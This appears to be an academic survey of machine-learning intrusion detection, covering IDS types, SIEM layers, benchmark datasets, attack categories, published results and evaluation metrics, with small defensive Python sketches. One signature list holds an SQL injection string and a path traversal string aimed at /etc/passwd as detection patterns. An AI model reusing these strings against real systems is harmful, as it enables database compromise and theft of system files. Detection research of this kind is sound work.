There are two types of attacks: passive and active. A passive attack attempts to obtain information to learn more about the system in order to compromise other resources. An active attack is directed at the system to alter its resources and operations. Most attacks begin with (passive) reconnaissance, which takes time because the attacker must learn the organization of the system, and it can account for up to 90% of the effort used for an intrusion. According to data reported in [4], U.S. companies in 2018 took 197 and 69 days to detect and contain data breaches, respectively, which implies a deficiency in APT detection systems and explains why the defending party cannot properly distinguish between a legitimate user and an adversarial user at each stage. Proactive defense measures are required, although such precautions can harm the user experience and reduce user productivity. According to the report published by [5], cyber threats are a global problem, and all sectors of daily life can be affected (Table 1).
Table 1. Global attack types and sources [5]
Global            Top attack types                Top attack sources
Finance (17%)     Web Attacks (46%)               United States (42%)
                  Service-Specific Attacks (28%)  China (9%)
                  DoS/DDoS (8%)                   United Kingdom (6%)
Technology (17%)  Reconnaissance (20%)            China (37%)
                  Brute-Force Attack (17%)        United States (21%)
                  Known Bad Source (14%)          Russia (5%)
Business (12%)    Web Attacks (42%)               United States (26%)
                  DoS/DDoS (20%)                  China (15%)
                  Known Bad Source (15%)          France (10%)
Education (11%)   Brute-Force Attack (47%)        United States (25%)
                  Web Attacks (18%)               Netherlands (16%)
                  Reconnaissance (16%)            Vietnam (15%)
Government (9%)   Service-Specific Attacks (27%)  United States (37%)
                  Reconnaissance (21%)            Germany (14%)
                  DoS/DDoS (16%)                  France (13%)
The forms of attack have evolved, but the types of threats remain practically the same [6], and it is important to know them to understand how they work (Fig. 1). Tools like TajMahal [7], which allow novice users to perform sophisticated attacks due to the simplicity of their modules, are alarm signals that information technology professionals must take very seriously. As presented in [8], 78% of the attacks identified during 2019 were successful, showing the vulnerability of computing infrastructures. The study presented in [9] describes various types of threats that can arise at different levels of the OSI model, considering the protocols defined at each level. Threats are also classified according to where they originate: Network, Host, Software, Physical, Human.
Machine Learning and IDS
61
Fig. 1. Taxonomy of cyberthreats [6].
2 Intrusion Detection System
An intrusion detection/prevention system (IDS/IPS) is a device or software application that monitors network or system activities for malicious activity or policy violations and performs the corresponding action. Intrusion detection systems are either network-based (NIDS) or host-based (HIDS). A HIDS cannot observe network traffic patterns, but it is excellent at detecting specific malicious activities and stopping them in their tracks. A NIDS analyzes the flow of information and detects specific suspicious activity before a data breach has occurred. The main characteristics of each IDS scheme are shown in Table 2 [11]. There are three dominant approaches in the current research literature and commercial systems: signature-based detection, supervised learning-based detection, and hybrid models [10]. Hybrid techniques used in IDS combine signature and anomaly detection. They are used to reduce false positives and increase the ability to identify unknown intrusions. Signature-based detection systems are highly effective at detecting the actions for which they were programmed to alert, that is, attacks or intrusions of a type that has been seen before. To do so, system logs are checked to find scripts or actions that have been identified as malware. When a new anomaly is discovered and its characteristics are clearly described, the associated signature is coded by human experts,
J. L. Gutierrez-Garcia et al.

Table 2. Types of IDS technology according to their position

| Technology | Advantages | Disadvantages | Data source |
|---|---|---|---|
| HIDS | It can verify the behavior of end-to-end encrypted communications. No additional hardware is required. Detects intrusions by verifying the file system, system calls or network events | Delay in reporting attacks. Consumes host resources. Requires installation on each device. It can only monitor the equipment on which it is installed | Audit logs, log files, APIs, system calls and pattern rules |
| NIDS | Detects attacks by checking network packets. It can check several devices at the same time. Detects the widest range of network protocols | The identification of attacks from traffic. Aimed at network attacks only. Difficulty analyzing high-speed networks | SNMP, TCP/UDP/ICMP. Management Information Base (MIB). Router NetFlow logs |
which is then used to detect new occurrences of the same action. These systems provide high precision for attacks that have been previously identified; however, they have difficulty identifying zero-day intrusions, since there is no previous signature against which to compare and, consequently, raise the corresponding warning or alarm, which makes these strategies less effective. The detection of anomalies involves two essential elements: first, there is a way to identify normal behavior, and second, any deviation from this behavior can be an indicator of unwanted activities (anomalies). Anomaly detection applies to various fields, such as weather anomalies, flight routes, bank transactions, academic performance, internal traffic in an organization’s network, and system calls or functions. The detection of anomalies in the network has become a vital component of any network on the current internet. From unexpected non-malicious events and sudden failures to network attacks and intrusions such as denial of service, network scanning, malware propagation and botnet activity, network traffic anomalies can have serious negative effects on network performance and integrity. The main challenge in automatically detecting and characterizing traffic anomalies is that they are a moving target. It is difficult to define precisely and continuously the set of possible anomalies that may arise, especially in the case of network attacks, as new attacks and new variants of known attacks are continually emerging. An anomaly detection system should be able to detect a wide range of anomalies with various structures, without relying solely on prior knowledge and information. In this type of system, a model of the normal behavior of the system is created through machine-learning, statistical or knowledge-based methods, and any observed deviation from that behavior is considered an
anomaly and, therefore, a possible intrusion. The main advantage of this type of system is that it can identify zero-day attacks, because it recognizes abnormal user activity without relying on a signature database. It also allows malicious internal activity to be identified by detecting deviations from common user behavior. A disadvantage of these IDS is that they can produce a high rate of false positive alerts. IDS/IPS, firewalls and sandboxes, among others, belong to the group of low-level elements that protect connected devices and systems, establish a security perimeter and prevent unauthorized access. Security Operations Centers (SOC) are specialized centers that collect security events, perform threat/attack detection, share threat intelligence, and coordinate responses to incidents. Security Information and Event Management (SIEM) systems support SOC operations through the management of incoming events, information classification, correlation inference, visualization of intermediate results and the integration of automatic detections. SIEM systems feed on the logs of running systems, DNS servers or security systems such as firewalls and IDS (Fig. 2).
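The two detection styles discussed in this section can be illustrated with a minimal sketch. It is not taken from any of the cited systems: the signature list, the requests-per-minute feature and the three-standard-deviation threshold are all assumptions chosen for illustration. A payload is first compared against known signatures, and only then is the traffic rate compared against a statistical model of normal behavior.

```python
from statistics import mean, stdev

# Hypothetical signature database: substrings previously coded by analysts.
SIGNATURES = ("' OR '1'='1", "../../etc/passwd")


def matches_signature(payload: str) -> bool:
    """Signature-based check: flag payloads that contain a known pattern."""
    return any(sig in payload for sig in SIGNATURES)


class RateBaseline:
    """Anomaly-based check: learn mean and spread of a metric from normal traffic."""

    def __init__(self, normal_samples, threshold=3.0):
        self.mu = mean(normal_samples)
        self.sigma = stdev(normal_samples)
        self.threshold = threshold  # assumed cut-off, in standard deviations

    def is_anomalous(self, value: float) -> bool:
        # Any deviation larger than threshold * sigma is treated as an anomaly.
        return abs(value - self.mu) > self.threshold * self.sigma


def hybrid_alert(payload: str, requests_per_minute: float, baseline: RateBaseline) -> str:
    """Hybrid scheme: try the signature check first, then the anomaly check."""
    if matches_signature(payload):
        return "signature"
    if baseline.is_anomalous(requests_per_minute):
        return "anomaly"
    return "ok"


# Made-up observations of normal traffic (requests per minute).
baseline = RateBaseline([48, 52, 50, 47, 53, 51, 49, 50])
print(hybrid_alert("GET /index.html", 51, baseline))
print(hybrid_alert("GET /?id=' OR '1'='1", 50, baseline))
print(hybrid_alert("GET /index.html", 400, baseline))
```

The third call shows why the anomaly check can catch an attack that has no signature, and the same mechanism explains the false positives mentioned above: a legitimate traffic spike would be flagged in exactly the same way.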
Fig. 2. Business cyber security levels [12].
The lowest level (L0) holds the information about the organization’s infrastructure. L1 provides a basic security analysis and also executes some real-time responses to malicious events, such as access control and intrusion prevention. The responses at this level are based on what are known as Indicators of Compromise (IoC). These indicators serve to discover connections among them and to find missing, lost or hidden components, and thus to obtain a global view of the attack. Each layer of the pyramid has programmed or analytical methods for processing the information. These methods rely on prior knowledge about malicious activities (signature-based antivirus, rule-based firewalls) or on knowledge of normal activities (anomaly detection). The intermediate layers (L1 to L3) use anomaly detection mechanisms, as described below:
L1. Detection at this level usually focuses on particular data, such as system calls, network packets or CPU usage. Table 3 shows implementations that carry out these activities.

Table 3. Commercial implementations at level L1 [12]

| Supplier | Product | Anomaly |
|---|---|---|
| Avast | Antivirus | Program behavior |
| Fortinet | IPS | Protocol |
| LogRhythm | Behavior of users and entities | EndPoint analysis |
| ManageEngine | Application Manager | Performance |
| RSA | Silver Tail | Network |
| Silicon Defense | Anomaly detection engine based on packet statistics | Network packets |
| SolarWinds | Log analysis of the IDS Snort | Network |
L2. SIEM systems connect activity fragments and infer behaviors from the flows of the L1 layer systems, and they also classify behaviors once an attack has been discovered. Some SIEM implementations use time series-based algorithms that consider a much longer time span than those used in the L1 layer. Users and entities can be identified from the flows provided by L1, which makes it possible to build user models and to check incoming user behavior against the model in order to detect compromised accounts, abuse of privileges, brute force, treatment filtering, etc. Table 4 shows commercial implementations.

Table 4. Commercial implementations at level L2 [12]

| Supplier | L2 SIEM product | Anomaly |
|---|---|---|
| EventTracker | Security Center | General behavior analysis |
| HPE | ArcSight | Peer group analysis |
| IBM | QRadar | Traffic behavior analysis |
| LogRhythm | LogRhythm | Users and entities analysis |
| MicroFocus | Sentinel Enterprise | Environment analysis |
| Splunk | Enterprise Security | Statistics and behavioral analysis |
| Trustwave | SIEM Enterprise | Network behavior analysis |
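As an illustration of the kind of correlation an L2 system performs over L1 events, the sketch below flags users with too many failed logins inside a sliding time window, which is one simple way of spotting brute-force attempts. It is a fixed-threshold rule, not a learned user model, and the event format `(timestamp_seconds, user, success)` as well as the default limits are assumptions made for this example.

```python
from collections import defaultdict, deque


def brute_force_suspects(events, max_failures=5, window_seconds=60):
    """Return the users with more than `max_failures` failed logins in any window.

    `events` is an iterable of (timestamp_seconds, user, success) tuples,
    sorted by timestamp. The format is hypothetical.
    """
    recent = defaultdict(deque)  # user -> timestamps of recent failed logins
    suspects = set()
    for ts, user, success in events:
        if success:
            continue
        window = recent[user]
        window.append(ts)
        # Discard failures that have fallen out of the time window.
        while window and ts - window[0] > window_seconds:
            window.popleft()
        if len(window) > max_failures:
            suspects.add(user)
    return suspects


# Made-up events: ten failures in 20 s for one user, two isolated ones for another.
events = [(t, "alice", False) for t in range(0, 20, 2)]
events += [(0, "bob", False), (300, "bob", False), (600, "bob", True)]
events.sort()
print(brute_force_suspects(events))
```

A per-user model, as described in the text, would replace the fixed `max_failures` with a limit derived from each user’s historical behavior.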
L3. Although the systems at this level are considered automatic, with self-learning characteristics and high precision, a human analyst must still intervene in the detection process because of the limited domain knowledge poured
into these systems, and in order to discard false positives, bearing in mind that an anomaly does not always indicate an attack or threat. The sources of information on security events include data on network traffic, firewall logs, and logs from web servers, systems, router access, databases, applications, etc. Additionally, the challenges of handling security-related data must be considered: assurance of the privacy, authenticity and integrity of event data, adversarial attacks and the time at which the attack is carried out. Commercial IDS rely on datasets to carry out their operations; however, these datasets are not publicly available for privacy reasons. There are public datasets, such as DARPA, KDD, NSL-KDD and ADFA-LD, which are used for training, testing and validating the different proposed models. Table 5 presents a summary of the most popular datasets.

Table 5. Public datasets

| DataSet | Description |
|---|---|
| DARPA/KDD Cup99 | Dataset developed by DARPA to strengthen the development of IDS. It consists of TCP packets captured over two months, with simulated attacks or intrusions interspersed. It has 4,900,000 records and 41 variables. In 1998, this dataset was used as a basis to form the KDD Cup99 that was used in the Third International Knowledge Discovery and Data Mining Tools Competition [13] |
| CAIDA | Dataset from 2007 that contains network traffic flows in DDoS attacks; containing only one type of attack is a disadvantage |
| NSL-KDD | Dataset developed in 2009 to address some problems of KDD Cup99 regarding accuracy and a high percentage of duplicate records, which influence ML algorithms |
| ISCX 2012 | It contains realistic network traffic with different types of attacks. Packets of the HTTP, SMTP, SSH, IMAP, POP3 and FTP protocols were captured |
| ADFA-LD/ADFA-WD | Datasets developed by the Australian Defense Force Academy containing records from the Linux and Windows operating systems of instances of zero-day malware attacks |
| CICIDS 2018 | It includes benign behavior and details of recent malware attacks in the categories of Brute Force FTP, Brute Force SSH, DoS, Heartbleed, Web Attack, Infiltration, Botnet and DDoS [14]. It is a very complete dataset that covers 80 characteristics of the captured traffic |
The work presented in [15] describes various datasets that have been used for research purposes, their characteristics and the types of attacks they contain. The CSE-CIC-IDS 2018 dataset was collected on one of Amazon’s AWS LAN networks (hence it is also known as the CIC-AWS-2018 dataset) by the Canadian Institute for Cybersecurity (CIC). It is the evolution of CICIDS 2017 and is publicly available for research. The types of attacks included in this dataset are:
– Botnet attack: A botnet is a collection of internet-connected devices infected by malware that allows hackers to control them. Cyber criminals use botnets to instigate botnet attacks, which include malicious activities such as credential leaks, unauthorized access, data theft and DDoS attacks.
– FTP-BruteForce: FTP brute force is a method of obtaining a user’s authentication credentials, such as the username and password used to log in to an FTP server. File servers are the repositories of any organization; attackers can use brute-force applications, such as password-guessing tools and scripts, to try all the combinations of well-known usernames and passwords.
– SSH-BruteForce: SSH is a high-security protocol. It uses strong cryptography to protect the connection against eavesdropping, hijacking and other attacks. However, brute-force attacks are a major security threat against remote services such as SSH. An SSH brute-force attack attempts to gain unauthorized access by guessing user account and password pairs.
– BruteForce-Web: Brute-force attacks take advantage of automation to try many more passwords than a human could, breaking into a system through trial and error. More targeted brute-force attacks use a list of common passwords to speed this up, and using this technique to check for weak passwords is often the first attack a hacker will try against a system.
– BruteForce-XSS: Malicious scripts can be injected into trusted web sites. XSS attacks occur when an attacker sends malicious code, generally in the form of a browser-side script, to a different end user.
– SQL Injection: A type of injection attack that makes it possible to execute malicious SQL statements. These statements control a database server behind a web application. Attackers can use SQL Injection vulnerabilities to bypass application security measures.
– DDoS-HOIC attack: Used for denial of service (DoS) and distributed denial of service (DDoS) attacks, HOIC works by flooding target systems with junk HTTP GET and POST requests, with the aim of flooding a victim’s network with web traffic and shutting down a web site or service.
– DDoS-LOIC-UDP attack: Floods the server with TCP or UDP packets, with the intention of interrupting the host service.
– DoS-Hulk attack: A typical HULK attack may attempt to launch a SYN flood against a target host in a single or distributed manner. In addition to a large number of legitimate HTTP requests, HULK will also generate a large number of uniquely crafted malicious HTTP requests.
– DoS-SlowHTTPTest attack: “Slow HTTP” attacks on web applications are based on the fact that the HTTP protocol, by design, requires that the requests that arrive
to it be complete before they can be processed. If an HTTP request is not complete or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data to arrive. If the server keeps many resources in use, a denial of service (DoS) could occur.
– DoS-GoldenEye attack: GoldenEye is similar to an HTTP flood and is a DDoS attack designed to overwhelm web servers’ resources by continuously requesting single or multiple URLs from many attacking source machines.
– DoS-Slowloris attack: Slowloris is an application layer DDoS attack which uses partial HTTP requests to open connections between a single computer and a targeted Web server, then keeps those connections open for as long as possible, thus overwhelming and slowing down the target.
3 Machine Learning and Intrusion Detection
Machine Learning (ML) refers to algorithms and processes that “learn” in the sense that they are able to generalize from past data and experience to predict future results. Essentially, it is a set of mathematical techniques implemented on computer systems to mine data, discover patterns and make inferences from the data [6]. Algorithms can be classified according to learning style. In supervised learning, the input data has known labels or results, which allow the model to be trained and corrected whenever it gives an incorrect result, until the desired level of precision is reached. In unsupervised learning, the input data is unlabeled and there is no known result; the model deduces the structure present in the input data. Finally, in semi-supervised learning, the input data is mixed, that is, both labeled and unlabeled. Algorithms can also be classified by the type of operation they perform; Table 6 shows this classification. The proposal in [16] describes a multilayer scheme for the timely identification of botnets (IRC, SPAM, Click Fraud, DDoS, FastFlux, Port Scan, Compiled and Controlled record by CTU, HTTP, Waledac, Storm and Zeus) that use different communication channels. It captures packets with specialized tools such as Wireshark, filters them so that only the desired protocol is considered, and achieves an accuracy of 98%. A review in [18] finds that many AI-generated models are susceptible to adversarial attacks. These attacks can occur during three stages: training, testing and deployment. Attacks can be either white box or black box, depending on how much is known about the target model. The study covers computer vision applications, image classification, semantic image segmentation and object detection, with only a brief segment on cybersecurity; however, it clearly exposes the vulnerabilities of the different models used.
A checklist is proposed in [19] for evaluating the robustness of defenses against adversarial attacks, ranging from the identification of the most tangible threat to the identification of the flags and traps that usually arise during an adversarial attack. The review carried out in [20] produced a classification of the main types of threats/attacks (Intrusion Detection System, Alert Correlation, DoS Detection, Botnet Detection, Forensic Analysis, APT Detection, Malware Detection, Phishing Detection) for which the
Table 6. Taxonomy of machine learning algorithms

| Algorithms | Description | Examples |
|---|---|---|
| Regression algorithms | Model the relationship between variables, using a measure of error in the predictions made by the model | Ordinary Least Squares Regression (OLSR), Linear Regression, Logistic Regression, Stepwise Regression, Multivariate Adaptive Regression Splines (MARS), Locally Estimated Scatterplot Smoothing (LOESS) |
| Instance-based algorithms | A database is built with sample data, and new incoming data is compared against the database using a similarity measure to find the best match and make a prediction | k-Nearest Neighbor (kNN), Learning Vector Quantization (LVQ), Self-Organizing Map (SOM), Locally Weighted Learning (LWL), Support Vector Machines (SVM) |
| Decision tree algorithms | A decision model is constructed from the values present in the attributes of the data. They are fast and are one of the main algorithms used in | Classification and Regression Tree (CART), Iterative Dichotomiser 3 (ID3), C4.5 and C5.0, Chi-squared Automatic Interaction Detection (CHAID), Decision Stump, M5, Conditional Decision Trees |
| Bayesian algorithms | They apply Bayes’ theorem to regression and classification problems | Naive Bayes, Gaussian Naive Bayes, Multinomial Naive Bayes, Averaged One-Dependence Estimators (AODE), Bayesian Belief Network (BBN), Bayesian Network (BN) |
| Clustering algorithms | Data structures are used to obtain the best organization in groups that are as homogeneous as possible | k-Means, k-Medians, Expectation Maximisation (EM), Hierarchical Clustering |
| Artificial neural network algorithms | Based on the functioning of biological neural networks. The input information passes through a series of operations, weight values and limiting functions | Perceptron, Multilayer Perceptrons (MLP), Back-Propagation, Stochastic Gradient Descent, Hopfield Network, Radial Basis Function Network (RBFN) |
| Deep learning algorithms | An evolution of artificial neural networks; they are more complex and extensive, designed to work with large labeled datasets of analog data, such as text, image, audio and video | Convolutional Neural Network (CNN), Recurrent Neural Networks (RNNs), Long Short-Term Memory Networks (LSTMs), Stacked Auto-Encoders, Deep Boltzmann Machine (DBM), Deep Belief Networks (DBN) |
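To make the instance-based row of Table 6 concrete, the following is a minimal k-Nearest Neighbor sketch in plain Python. The stored samples play the role of the "database", Euclidean distance is the similarity measure, and the prediction is a majority vote. The two features (flow duration and packets per second) and all values are invented for illustration and do not come from any dataset discussed here.

```python
from collections import Counter
from math import dist


def knn_predict(train, query, k=3):
    """Classify `query` by majority vote among its k nearest training samples.

    `train` is a list of (feature_vector, label) pairs.
    """
    neighbours = sorted(train, key=lambda item: dist(item[0], query))[:k]
    votes = Counter(label for _, label in neighbours)
    return votes.most_common(1)[0][0]


# Toy flows: (duration in seconds, packets per second) -> label. Values are made up.
train = [
    ((1.0, 10.0), "benign"),
    ((1.2, 12.0), "benign"),
    ((0.9, 11.0), "benign"),
    ((0.1, 900.0), "attack"),
    ((0.2, 950.0), "attack"),
    ((0.1, 870.0), "attack"),
]
print(knn_predict(train, (0.15, 920.0)))
print(knn_predict(train, (1.1, 9.0)))
```

In practice the features would be scaled first, since an unscaled feature with a large range (here, packets per second) dominates the distance.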
efforts to counter them have been investigated and published, together with the quality attributes that must be considered when making a proposal and the architectural aspects needed to satisfy them. The review exposes a great disconnect between academia and industry in terms of shared data, as well as in the implementation of security analytics systems in a business environment. Given the lack of information for research on recent intrusion events, [21] proposes a cloud-based sharing scheme among research and collaborating institutions with five levels of trust and security; however, according to the authors themselves, it is still so complex and extensive that security experts are required to start the process. The proposed framework is accompanied by agreements and policies for sharing information on cyber threats. Regarding ransomware attacks, [22] proposes an implementation that uses supervised ML to detect ransomware from small datasets, reporting an accuracy of 95%. It should be noted that no further details are provided on the characteristics of the datasets used. This type of malware executes a series of operations [Reconnaissance, Weaponization, Delivery, Exploitation, Installation, Command and Control (C2), Actions on Objectives] to carry out the task for which it was designed [23]. Botnets are a great threat, since they can be used for various malicious activities such as distributed denial of service (DDoS), mass sending of junk mail, phishing, DNS spoofing and adware installation. The analysis in [24] describes the main components of a botnet, its communication mechanisms and its architecture, and states that detection mechanisms based on signatures, anomalies and hybrids are the most widely used so far.
The proposal in [25] identifies bots through graphs, which are more intuitive, instead of flows, because of the computational cost of the latter. The proposal in [26] describes a multilayer scheme for the timely identification of botnets (IRC, SPAM, Click Fraud, DDoS, FastFlux, Port Scan, Compiled and Controlled record by CTU, HTTP, Waledac, Storm and Zeus) that use different communication channels. It captures packets with specialized tools such as Wireshark, filters them so that only the desired protocol is considered, and achieves an accuracy of 98% according to the published information. Tables 7, 8 and 9 show a summary of recent publications on the application of ML to intrusion detection for various types of attacks. The incidence of the main ML algorithms is shown in Fig. 3, where supervised learning is the most used category.
4 Metrics
There are many metrics for measuring IDS performance, and some are more suitable than others. For example, when the data is not balanced, as is the case with network traffic data for the classification of attacks, the accuracy metric is not recommended [17]. The choice of metrics to evaluate the Machine
Table 7. Machine learning in intrusion detection. Year 2019

| Year | Description | DataSet | Algorithm | Accuracy |
|---|---|---|---|---|
| 2019 [27] | Applies an RNN to obtain the best characteristics dynamically, based on the values that the variables present daily for each type of attack | ISCX 2012 | RNN | 86–90% |
| 2019 [28] | Evaluates various supervised learning algorithms on each of the attacks established in the dataset | CIC-AWS-2018 | RF, Gaussian naive Bayes, Decision tree, MLP, K-NN | 96–100% |
| 2019 [35] | Flow-based anomaly detection in software-defined networks, optimizing feature selection through ANOVA F-Test and RFE and ML algorithms | NSL-KDD | RF, DNN | 88% |
| 2019 [36] | Classifies network flows through the LSTM model | ISCX2012, USTC-TFC2016, IoT dataset from Robert Gordon University | LSTM | 99.46% |
Learning model is very important, since it influences the way in which the model is measured and compared. Confusion Matrix: A tool within supervised learning for observing the behavior of the model. The test data shows where the model confuses the classes it has to classify. Table 10 shows the layout of the matrix, where the columns indicate the actual values and the rows the values that the model predicts. Based on the information in the matrix, the following can be defined: TP: the number of actual positive values that were correctly classified as positive by the model. TN: the number of actual negative values that were correctly classified as negative by the model. FP: the number of actual negative values that were incorrectly classified as positive by the model. FN: the number of actual positive values that were incorrectly classified as negative by the model.
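The four counts defined above can be obtained directly from a list of actual labels and a list of predicted labels. The sketch below is illustrative only; the label names `"attack"` and `"normal"` and the sample data are assumptions.

```python
def confusion_counts(actual, predicted, positive="attack"):
    """Count TP, FP, FN and TN for a binary problem."""
    tp = fp = fn = tn = 0
    for a, p in zip(actual, predicted):
        if p == positive and a == positive:
            tp += 1  # attack correctly flagged
        elif p == positive and a != positive:
            fp += 1  # normal traffic flagged as attack (false alarm)
        elif p != positive and a == positive:
            fn += 1  # attack missed by the model
        else:
            tn += 1  # normal traffic correctly left alone
    return {"TP": tp, "FP": fp, "FN": fn, "TN": tn}


# Made-up labels for six flows.
actual = ["attack", "attack", "normal", "normal", "attack", "normal"]
predicted = ["attack", "normal", "normal", "attack", "attack", "normal"]
print(confusion_counts(actual, predicted))
```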
Table 8. Machine learning in intrusion detection. Year 2020

| Year | Description | DataSet | Algorithm | Accuracy |
|---|---|---|---|---|
| 2020 [29] | A hybrid IDS is proposed that combines a C5 decision tree classifier to identify known attacks and a One Class Support Vector Machine to identify intrusions by means of anomalies. The Network Security Laboratory-Knowledge Discovery in Databases (NSL-KDD) and Australian Defense Force Academy (ADFA) datasets are used | NSL-KDD and ADFA | Decision tree, SVM | 83.24, 97.4% |
| 2020 [30] | Proposes a new algorithm based on SVM, more resistant to noise and deviations, oriented to data on the sequence of system calls | UNM sendmail, UNM live lpr published by New Mexico university | FSVM based on SVDD | 86.92% |
| 2020 [31] | A DNN and association rules using the NSL-KDD dataset to mine network traffic and classify it; subsequently, through the Apriori algorithm, it seeks to eliminate false positives | NSL-KDD | DNN | 89.01–99.01% |
| 2020 [32] | Adaptation of the available datasets to balance them through the SMOTE technique, generating synthetically balanced data | CIDDS-001 and ISCXBot-2014 | KNN, DT, SVM, LR, RF | 93.37–98.84% |
| 2020 [33] | A multilayer hierarchical model that works in conjunction with knowledge-based models. First, a binary classification is carried out, then the type of attack is identified and finally the previous knowledge is extracted to update the detail about the type of attack and thus improve the performance of the classifier. The time spent on training is greater than in other proposals | KDD 99 | C4.5, RF, EM, FPA | 99.8% |
From this confusion matrix, various metrics have been generated, oriented to problems of classification (Table 11), Regression (Table 12) or clustering (Table 13).
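The classification metrics of Table 11 follow directly from the four confusion matrix counts. The sketch below computes them and uses an invented, heavily imbalanced example (10 attacks among 1,000 flows) to show why accuracy alone can be misleading; the helper name and the numbers are assumptions made for illustration.

```python
def classification_metrics(tp, tn, fp, fn):
    """Compute the metrics of Table 11 from confusion matrix counts."""

    def ratio(num, den):
        # Guard against empty denominators (e.g. no positive predictions).
        return num / den if den else 0.0

    precision = ratio(tp, tp + fp)
    recall = ratio(tp, tp + fn)
    return {
        "accuracy": ratio(tp + tn, tp + tn + fp + fn),
        "recall": recall,                      # TPR, sensitivity
        "fpr": ratio(fp, fp + tn),             # false alarm rate
        "fnr": ratio(fn, fn + tp),
        "tnr": ratio(tn, tn + fp),             # specificity
        "precision": precision,
        "f1": ratio(2 * precision * recall, precision + recall),
    }


# Imbalanced toy case: 990 normal flows and 10 attacks; only 2 attacks are caught.
m = classification_metrics(tp=2, tn=990, fp=0, fn=8)
for name, value in m.items():
    print(f"{name}: {value:.3f}")
```

Here accuracy is above 99% even though 8 of the 10 attacks are missed, while recall and F1 expose the problem. This is the situation described above, in which accuracy is not recommended for unbalanced data.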
Table 9. Machine learning in intrusion detection. Year 2021

| Year | Description | DataSet | Algorithm | Metrics |
|---|---|---|---|---|
| 2021 [44] | They propose a two-phase technique called IOL-IDS. The first phase is based on the Long Short-Term Memory (LSTM) classifier and the Improved One-vs-One technique to handle frequent and infrequent intrusions. In the second phase, ensemble algorithms are used to identify the types of intrusion attacks detected in each of the datasets used | NSL-KDD, CIDDS-001, CICIDS2017 | LSTM | Recall: 31–98%, Precision: 64–95%, F1: 56–94% |
| 2021 [43] | It uses a 4-step method to detect DDoS attacks: preprocessing (coding, log2, PCA), model generation through Random Forest, contrast tests with Naive Bayes, and evaluation with rates of accuracy, false alarm, detection, precision and F-measure | MIX (PORTMAP + LDAP) CICDDOS2019 | RF, NB | Accuracy = 99.97%, F1-score = 99.9% |
| 2021 [45] | They propose an oversampling technique based on Generative Adversarial Networks (GAN) applied to the class identified as attack, and feature selection through ANOVA, in order to balance the dataset and improve the effectiveness of intrusion detection | NSL-KDD, UNSW-NB15 and CICIDS-2017 | NB, DT, RF, GBDT, SVM, K-NN, ANN | Accuracy = 97.7–99.84%, F1-score = 91.89–99.6% |
| 2021 [46] | This study benchmarks the main algorithms to evaluate the performance of the models in the detection of intrusions through various metrics, considering different percentages in the k-fold cross-validation. Only Brute Force, XSS and SQL Injection attack types were considered | CICIDS2017 | ANN, DT, KNN, NB, RF, SVM, CNN, K-Means, SOM, EM | Accuracy: 75.21–99.52%, Precision: 99.01–99.49%, Recall: 76.6–99.52% |
| 2021 [34] | This study uses several ML algorithms to identify anomalous behavior with an IDS on the SDN controller. It first identifies whether there is an attack and then classifies it into the corresponding attack type | NSL-KDD | DT, RF, XGBoost | Accuracy: 95.95%, Precision: 92%, Recall: 98%, F1-score: 95.55% |
Fig. 3. ML algorithms [2019–2020].

Table 10. Confusion matrix

| | ACTUAL Positives | ACTUAL Negatives |
|---|---|---|
| PREDICTED Positives | TP | FP |
| PREDICTED Negatives | FN | TN |
5 Challenges
Dataset: Most of the studies reviewed use old and outdated datasets that do not reflect the current situation when identifying intrusions with different ML algorithms. This is due to the poor accessibility of data on the most recent cybersecurity events that companies are facing. To deal with this situation, many researchers choose to generate their own datasets, but these must be updated constantly with the latest attacks, which involves continuous collection of network and system data in order to keep training and testing as close to reality as possible.
Linking Academy - Industry: Research is conducted in simulated settings within academia; however, these settings are very different from real scenarios within organizations, where the threats or attacks faced are very broad and complex and require immediate analysis and response. This creates a distance between the two and leads to outdated knowledge. Collaboration agreements with academic entities are required to train specialized personnel and to access up-to-date data, so that research results have an effective impact and are implemented promptly, while complying with all privacy and information access responsibilities.
Adversarial Attacks: Any strategy implemented through ML allows promising advances and results; however, the same ML technology can be used to generate
Table 11. Performance metrics to evaluate machine learning algorithms for classification.

| Metrics | Formula |
|---|---|
| Classification rate or Accuracy (CR): It is the accuracy rate in detecting abnormal or normal behavior. It is normally used when the dataset is balanced, to avoid a false sense of good model performance | $CR = \frac{TP + TN}{TP + TN + FP + FN}$ (1) |
| Recall (R) or True Positive Rate (TPR) or Sensitivity: It results from dividing the number of correctly estimated attacks by the total number of attacks. It is the ability of the classifier to detect all positive cases (attacks) | $TPR = \frac{TP}{TP + FN}$ (2) |
| False Positive Rate (FPR): It is the rate of false alarms | $FPR = \frac{FP}{FP + TN}$ (3) |
| False Negative Rate (FNR): It occurs when the detector fails to identify an abnormality and classifies it as normal | $FNR = \frac{FN}{FN + TP}$ (4) |
| True Negative Rate (TNR): Also known as specificity. It covers the normal cases that are identified as such | $TNR = \frac{TN}{TN + FP}$ (5) |
| Precision (P): Represents the confidence of attack detection. It is useful when Accuracy is not recommended because the dataset is not balanced | $P = \frac{TP}{TP + FP}$ (6) |
| F1-Score: It is the harmonic mean of Precision and Recall (TPR), which gives a value close to the lower of the two when they are disproportionate. A value close to 1 means that the classifier performance is optimal | $F1 = \frac{2PR}{P + R}$ (7) |
| ROC Curve: It is a graph that shows the performance of a binary classifier as a function of the cutoff threshold | |
| Area Under the Curve (AUC): It is the probability that the model ranks a random positive example higher than a random negative example | |
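The probabilistic reading of AUC can be checked with a direct, if inefficient, computation: compare every positive example with every negative example and count how often the positive one receives the higher score. This is a sketch for small inputs only; the scores are invented and counting ties as one half is a common convention assumed here.

```python
def auc_by_ranking(scores_pos, scores_neg):
    """AUC as the fraction of (positive, negative) pairs ranked correctly."""
    wins = 0.0
    for p in scores_pos:
        for n in scores_neg:
            if p > n:
                wins += 1.0
            elif p == n:
                wins += 0.5  # ties count as half (assumed convention)
    return wins / (len(scores_pos) * len(scores_neg))


# Made-up classifier scores: higher means "more likely an attack".
attack_scores = [0.9, 0.8, 0.4]
normal_scores = [0.7, 0.3, 0.2, 0.1]
print(auc_by_ranking(attack_scores, normal_scores))
```

Eleven of the twelve pairs are ordered correctly in this example; only the attack scored 0.4 falls below the normal flow scored 0.7.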
attacks against the models in charge of identifying intrusions, biasing the results in favor of the attackers’ interests. Many of the studies reviewed do not consider this type of attack against their proposals, so it would be desirable to know how robust each proposal is against adversarial attacks, since these can evade the model after it has been trained or contaminate the training data to force the model to misclassify [37–39].
Table 12. Performance metrics to evaluate machine learning algorithms for regression.

| Metrics | Formula |
|---|---|
